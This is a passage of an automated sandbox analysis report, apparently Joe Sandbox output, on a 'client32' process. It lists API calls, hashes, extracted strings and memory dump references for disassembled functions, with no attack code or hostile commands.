                                                                                                                        • Opcode Fuzzy Hash: cddf9315703bad504045fd98c9e1cfe8d04d1f92840bc27388ccda177a2b43ee
                                                                                                                        • Instruction Fuzzy Hash: 92015E719007189BD7A0DFA9DC44BDAF7F9AB84310F1042AAD519A6290DB706988CF51
                                                                                                                        APIs
                                                                                                                        • EnterCriticalSection.KERNEL32(685DB898,?), ref: 6859812C
                                                                                                                        • LeaveCriticalSection.KERNEL32(685DB898), ref: 68598141
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$EnterLeave
                                                                                                                        • String ID: RESULT$a3Zh
                                                                                                                        • API String ID: 3168844106-3818967759
                                                                                                                        • Opcode ID: 1916ae29f21829a5021a9e567ad8a8e9baf75ae41c15dc09188afa1b625017e2
                                                                                                                        • Instruction ID: f8c136c1981860d98b2b961d25e3bf584bcdf222b6e41de574f74e6c2b3f08e7
                                                                                                                        • Opcode Fuzzy Hash: 1916ae29f21829a5021a9e567ad8a8e9baf75ae41c15dc09188afa1b625017e2
                                                                                                                        • Instruction Fuzzy Hash: 8EF022F7C442407FEF109A69AC45BAF7AACDB81294FC20062ED4A83101E734AD4082B7
                                                                                                                        APIs
                                                                                                                        • EnterCriticalSection.KERNEL32(685DB898), ref: 68595B45
                                                                                                                        • LeaveCriticalSection.KERNEL32(685DB898), ref: 68595B76
                                                                                                                        • SetEvent.KERNEL32(00000304), ref: 68595B8E
                                                                                                                        • LeaveCriticalSection.KERNEL32(685DB898), ref: 68595B99
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$Leave$EnterEvent
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3394196147-0
                                                                                                                        • Opcode ID: dc7f8f2d0725482f5796ff0361690898635498e31261805ba8a913a6cafe9f0f
                                                                                                                        • Instruction ID: 071c74552bd03b6e2a2130df725f45ac1fbb8cf9912f83ab9758053b877d1ed6
                                                                                                                        • Opcode Fuzzy Hash: dc7f8f2d0725482f5796ff0361690898635498e31261805ba8a913a6cafe9f0f
                                                                                                                        • Instruction Fuzzy Hash: E8F062325441A5FFCF11EFA884084DD7B76E6063667838446ED5B57501D720A845CBAA
                                                                                                                        APIs
                                                                                                                        • EnterCriticalSection.KERNEL32(685DB898), ref: 68595AD0
                                                                                                                        • _memmove.LIBCMT ref: 68595AEC
                                                                                                                        • _memmove.LIBCMT ref: 68595B0A
                                                                                                                        • LeaveCriticalSection.KERNEL32(685DB898), ref: 68595B17
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection_memmove$EnterLeave
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 324922381-0
                                                                                                                        • Opcode ID: ad1d9fc5d26844ab90e6abc2080e6ac3a119d1f65c14e4a216e3bf781054fb0d
                                                                                                                        • Instruction ID: 8a9ef9100a8dac2c4e2a8152beff8e895988585c8f0ee727ee4c4f6bdf572ad7
                                                                                                                        • Opcode Fuzzy Hash: ad1d9fc5d26844ab90e6abc2080e6ac3a119d1f65c14e4a216e3bf781054fb0d
                                                                                                                        • Instruction Fuzzy Hash: 40F05E79601110AFEE50AB68D881CAE37AADA857123958419FC1597300D630EC418BAE
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                          • Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477
                                                                                                                        • CreateWindowExA.USER32(00000000,edit,00000000,40040004,?,?,?,?,?,00000002,00000000,?), ref: 11007327
                                                                                                                        • SetFocus.USER32(?), ref: 11007383
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateFocusWindow_memsetwsprintf
                                                                                                                        • String ID: edit
                                                                                                                        • API String ID: 133491855-2167791130
                                                                                                                        • Opcode ID: f65e150b113dac071697823f5246cea45f0e0d9d2d8fe942133c289e5f9292e4
                                                                                                                        • Instruction ID: f78834b4020d8e2e6f829c6f5032a1a8cba214c943ee8e0f2be50220b25a4479
                                                                                                                        • Opcode Fuzzy Hash: f65e150b113dac071697823f5246cea45f0e0d9d2d8fe942133c289e5f9292e4
                                                                                                                        • Instruction Fuzzy Hash: 4851B0B5A00606AFE741CFA8DC80BABB7E5FB48354F11856DF995C7340EA34A942CB61
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 110948B0: GetSystemMetrics.USER32(0000004C), ref: 110948BE
                                                                                                                          • Part of subcall function 110948B0: GetSystemMetrics.USER32(0000004D), ref: 110948C7
                                                                                                                          • Part of subcall function 110948B0: GetSystemMetrics.USER32(0000004E), ref: 110948CE
                                                                                                                          • Part of subcall function 110948B0: GetSystemMetrics.USER32(00000000), ref: 110948D7
                                                                                                                          • Part of subcall function 110948B0: GetSystemMetrics.USER32(0000004F), ref: 110948DD
                                                                                                                          • Part of subcall function 110948B0: GetSystemMetrics.USER32(00000001), ref: 110948E5
                                                                                                                        • GetRegionData.GDI32(?,00001000,?), ref: 1103F2D5
                                                                                                                          • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                          • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                          • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                          • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: MetricsSystem$DataErrorExitLastMessageProcessRegionwsprintf
                                                                                                                        • String ID: IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
                                                                                                                        • API String ID: 1231476184-2270926670
                                                                                                                        • Opcode ID: bcf8010bd49bb8a48e5ff97e5ecb267e14ecb5a38bedc9232b3b103d8f10203e
                                                                                                                        • Instruction ID: 7bd6763c5981859c823165d8063a1c4bf52d6bb4432795ccb6ce09120d22f5b2
                                                                                                                        • Opcode Fuzzy Hash: bcf8010bd49bb8a48e5ff97e5ecb267e14ecb5a38bedc9232b3b103d8f10203e
                                                                                                                        • Instruction Fuzzy Hash: C2613DB5E001AA9FCB24CF54CD84ADDF3B5BF88304F0082D9E689A7244DAB46E85CF51
                                                                                                                        APIs
                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 6859FBD5
                                                                                                                        • _memmove.LIBCMT ref: 6859FC26
                                                                                                                          • Part of subcall function 6859F470: std::_Xinvalid_argument.LIBCPMT ref: 6859F48A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Xinvalid_argumentstd::_$_memmove
                                                                                                                        • String ID: string too long
                                                                                                                        • API String ID: 2168136238-2556327735
                                                                                                                        • Opcode ID: 4b1b0a5c2d314a93db9e7b30bd2ab505b0c726ea5d84bbc897fd3a60dfd08950
                                                                                                                        • Instruction ID: 5be6adab8e1debc6640840de9a6675ea764e7126c5b5105fc23bea4dd9401dc0
                                                                                                                        • Opcode Fuzzy Hash: 4b1b0a5c2d314a93db9e7b30bd2ab505b0c726ea5d84bbc897fd3a60dfd08950
                                                                                                                        • Instruction Fuzzy Hash: 453128323046909BDB208E5CE8A0A6AF7EEEF95764BA0491FF491C7640C7F1DC4183A1
                                                                                                                        APIs
                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 11009295
                                                                                                                        • _memmove.LIBCMT ref: 110092E6
                                                                                                                          • Part of subcall function 11008D80: std::_Xinvalid_argument.LIBCPMT ref: 11008D9A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Xinvalid_argumentstd::_$_memmove
                                                                                                                        • String ID: string too long
                                                                                                                        • API String ID: 2168136238-2556327735
                                                                                                                        • Opcode ID: 91e1c889b45ef3916207e9bff09e53fb613e1cc83fc8da0f74f3339f2b8fe869
                                                                                                                        • Instruction ID: be305049c21c6d802d82ad86ff43ec2f0153ea4b5fc4fe3555ff5b1edb8d11a0
                                                                                                                        • Opcode Fuzzy Hash: 91e1c889b45ef3916207e9bff09e53fb613e1cc83fc8da0f74f3339f2b8fe869
                                                                                                                        • Instruction Fuzzy Hash: 0A31DB32F046109BF720DD9CE88095AF7EDEFA57A4B20462FE58AC7740EB719C4487A0
                                                                                                                        APIs
                                                                                                                        • FormatMessageA.KERNEL32(00000400,?,00000000,00000000,?,00000401,?,?,?,?), ref: 111432DB
                                                                                                                        • wvsprintfA.USER32(?,?,?), ref: 111432F2
                                                                                                                        Strings
                                                                                                                        • ERROR TOO LONG: fmt_string=<%s>, s=<%.80s>, xrefs: 1114330A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FormatMessagewvsprintf
                                                                                                                        • String ID: ERROR TOO LONG: fmt_string=<%s>, s=<%.80s>
                                                                                                                        • API String ID: 65494530-3330918973
                                                                                                                        • Opcode ID: 4f255fee6f7a36d2343be92b14a67b8c036efb71b9771a05c8b56e11d64a2540
                                                                                                                        • Instruction ID: 325346ff02c3342125f3bb2915ef43e6aa784d2796c19ba5a5be54d08933bc26
                                                                                                                        • Opcode Fuzzy Hash: 4f255fee6f7a36d2343be92b14a67b8c036efb71b9771a05c8b56e11d64a2540
                                                                                                                        • Instruction Fuzzy Hash: DA21B6B1D1422DAED710CB94DC81FEFFBBCEB44614F104169EA0993240DB75AA84CBA5
                                                                                                                        APIs
                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 1100F10B
                                                                                                                          • Part of subcall function 1115CBB3: std::exception::exception.LIBCMT ref: 1115CBC8
                                                                                                                          • Part of subcall function 1115CBB3: __CxxThrowException@8.LIBCMT ref: 1115CBDD
                                                                                                                          • Part of subcall function 1115CBB3: std::exception::exception.LIBCMT ref: 1115CBEE
                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 1100F122
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                                                                                        • String ID: string too long
                                                                                                                        • API String ID: 963545896-2556327735
                                                                                                                        • Opcode ID: ac563746f8d289c4c30f2701c9d81f44c6154b7c84ff09c16f1d9c640ce089b7
                                                                                                                        • Instruction ID: 820ae926dfc744509ffc298ffbf7719e1583de006a97f4842800b066cd7400cd
                                                                                                                        • Opcode Fuzzy Hash: ac563746f8d289c4c30f2701c9d81f44c6154b7c84ff09c16f1d9c640ce089b7
                                                                                                                        • Instruction Fuzzy Hash: BA11D632B046145BE321DD5CE880BAAF7EDEF966A4F10066FF591CB640CBA1A80593A1
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _memmove
                                                                                                                        • String ID: @
                                                                                                                        • API String ID: 4104443479-2766056989
                                                                                                                        • Opcode ID: f9483b5ad1248861c0422d5c3db81375aa2358dc5ca2805fe77c16bdf1cdb177
                                                                                                                        • Instruction ID: ef4c41485c8231ec35914ad2afd3158cc1aa9b44a2ac9f007eb0b86c0557a430
                                                                                                                        • Opcode Fuzzy Hash: f9483b5ad1248861c0422d5c3db81375aa2358dc5ca2805fe77c16bdf1cdb177
                                                                                                                        • Instruction Fuzzy Hash: 6711D3B6940709AFDB14CF54D8D49AF37B9EB94218F50492DE9064B201E730EE4ACBA2
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 0f]h
                                                                                                                        • API String ID: 0-3511245404
                                                                                                                        • Opcode ID: 25df2f25d94d407b19a6a0defe36a3784a1effa211465d0d7a142dbbbc6d99e9
                                                                                                                        • Instruction ID: 54ade0885d5ce61d436b3623031f9ea73a0528844248711184175b6585859b77
                                                                                                                        • Opcode Fuzzy Hash: 25df2f25d94d407b19a6a0defe36a3784a1effa211465d0d7a142dbbbc6d99e9
                                                                                                                        • Instruction Fuzzy Hash: CA1190799007099BD720DE98E8C0EABB3B9FB84204F844929D96697601D730F915CBA1
                                                                                                                        APIs
                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 6859C8A6
                                                                                                                          • Part of subcall function 685B1960: std::exception::exception.LIBCMT ref: 685B1975
                                                                                                                          • Part of subcall function 685B1960: __CxxThrowException@8.LIBCMT ref: 685B198A
                                                                                                                          • Part of subcall function 685B1960: std::exception::exception.LIBCMT ref: 685B199B
                                                                                                                        • _memmove.LIBCMT ref: 6859C8DF
                                                                                                                        Strings
                                                                                                                        • invalid string position, xrefs: 6859C8A1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
